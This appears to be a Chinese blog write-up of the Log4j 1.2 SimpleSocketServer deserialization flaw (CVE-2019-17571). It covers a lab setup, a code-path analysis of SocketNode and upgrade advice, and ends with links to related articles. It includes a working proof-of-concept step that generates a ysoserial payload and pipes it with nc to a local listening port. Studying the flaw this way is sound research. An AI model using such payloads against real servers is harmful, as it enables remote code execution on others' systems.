Apache Log4j 反序列化代码执行(CVE-2019-17571) 漏洞分析
Apache Log4j 漏洞分析
仅用于研究漏洞原理,禁止用于非法用途,后果自负!!!
CVE-2019-17571
漏洞描述
Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具。Log4j 1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。
环境搭建
方便测试,添加JDK7U21的漏洞环境
- 新建Maven项目,pom.xml中添加
 
<dependencies>
    <dependency>
        <groupId>log4j</groupId>
        <artifactId>log4j</artifactId>
        <version>1.2.17</version>
    </dependency>
</dependencies>
- 编写测试方法
 
public class CVE_2019_17571 {
    private static final Logger log = Logger.getLogger(SimpleSocketServer.class);
    public static void main(String[] args) {
        System.out.println("start:");
        String[] argss = {"4444", "src/log4j.properties"};
        SimpleSocketServer.main(argss);
        log.info("succ");
    }
}
- Ysoserial生成POC(JDK7U21),发送POC
 
java -jar ysoserial.jar JDK7U21 "calc" > poc.ser
cat poc.ser | nc 127.0.0.1 4444
漏洞分析
- org.apache.log4j.net.SimpleSocketServer#main()
首先开启Log4j自带的SocketServer服务器时,会监听设置的端口,然后获取Socket对象,进入SocketNode类进行处理.

 - org.apache.log4j.net.SocketNode
SocketNode类的构造方法中会对socket接收的数据封装为一个Object流对象.

 - org.apache.log4j.net.SocketNode#run()
在run()方法中直接进行反序列化

 
漏洞修复
目前官方已在Apache Log4j 2.8.2版本之后修复了该漏洞,请受影响的用户升级至2.8.2 或更高的版本进行防护.
参考
【威胁通告】Apache Log4j 反序列化远程代码执行(CVE-2019-17571)漏洞威胁通告
Apache Log4j 反序列化代码执行(CVE-2019-17571) 漏洞分析的更多相关文章
- 修复Apache Log4j任意代码执行漏洞安全风险通告
		
2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...
 - Apache Log4j 远程代码执行漏洞源码级分析
		
漏洞的前因后果 漏洞描述 漏洞评级 影响版本 安全建议 本地复现漏洞 本地打印 JVM 基础信息 本地获取服务器的打印信息 log4j 漏洞源码分析 扩展:JNDI 危害是什么? GitHub 项目 ...
 - Apache log4j2 远程代码执行漏洞复现👻
		
Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...
 - Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现
		
Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现 一. 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方 ...
 - Apache Log4j2远程代码执行漏洞攻击,华为云安全支持检测拦截
		
近日,华为云安全团队关注到Apache Log4j2 的远程代码执行最新漏洞.Apache Log4j2是一款业界广泛使用的基于Java的日志工具,该组件使用范围广泛,利用门槛低,漏洞危害极大.华为云 ...
 - Apache Kylin远程代码执行漏洞复现(CVE-2020-1956)
		
Apache Kylin远程代码执行(CVE-2020-1956) 简介 Apache Kylin 是美国 Apache 软件基金会的一款开源的分布式分析型数据仓库.该产品主要提供 Hadoop/Sp ...
 - Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现
		
Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现 前言 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供 ...
 - Apache Struts 远程代码执行漏洞(CVE-2013-4316)
		
漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...
 - 【预警通告】Apache Struts2 远程代码执行漏洞
		
Apache Structs2的Jakarta Multipart parser插件存在远程代码执行漏洞,漏洞编号为CVE-2017-5638.攻击者可以在使用该插件上传文件时,修改HTTP请求头中的 ...
 
随机推荐
- ip 地址库 这个 准么 呢
 - Linux  高压缩率工具 XZ 压缩详解
			
目录 一.XZ 基础信息 二.安装 三.详解 3.1.常用的参数 3.2. 常用命令 四.扩展 4.1.unxz 4.2.xzcat 4.3.lzma 4.4.unlzma 4.5.lzcat 一.X ...
 - ios--->NStimer用法
			
NStimer用法 1.初始化 (NSTimer *)timerWithTimeInterval:(NSTimeInterval)ti target:(id)aTarget selector:(SEL ...
 - 当vps服务器被墙,如果用xshell连接
			
当然你的被墙了,肯定是访问不了,你得去找一个新的可用的节点去访问,在xshell里面设置代理就能连接上.上图. 然后是两个不同的结点 鼠标放在小火箭上面就能显示
 - 《ASP.NET Core 高性能系列》ASP.NET Core的启动过程(1)
			
一.一切从头开始 简述:知道事情的真相就应该从头 开始,下面我们代码先行 public class Program { public static void Main(string[] args) { ...
 - 解决IDEA使用lombok注解无效,@Data不生效问题
			
在settings设置启用注解即可:
 - Docker Mysql部署与使用
			
参考链接:Docker 安装 Mysql 详解
 - Message: 'chromedriver' executable needs to be available in the path.
			
环境:windows10 python:3.7.3 已经把 executable.exe 添加到了环境变量中,但还是会提示以上错误. 解决办法: from selenium import webdri ...
 - json通过后台获取数据库中的内容,并在前端进行显示
			
fastjson.jar以及Echarts树图的js文件(需要在servlet对json进行赋值,所以需要用到json的插件) 链接:https://pan.baidu.com/s/1GBbamPNG ...
 - HTTP协议简单理解
			
1.概念: “超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议.所有的WWW文件都必须遵守这个标准. 设计HTTP最初的目的是为了 ...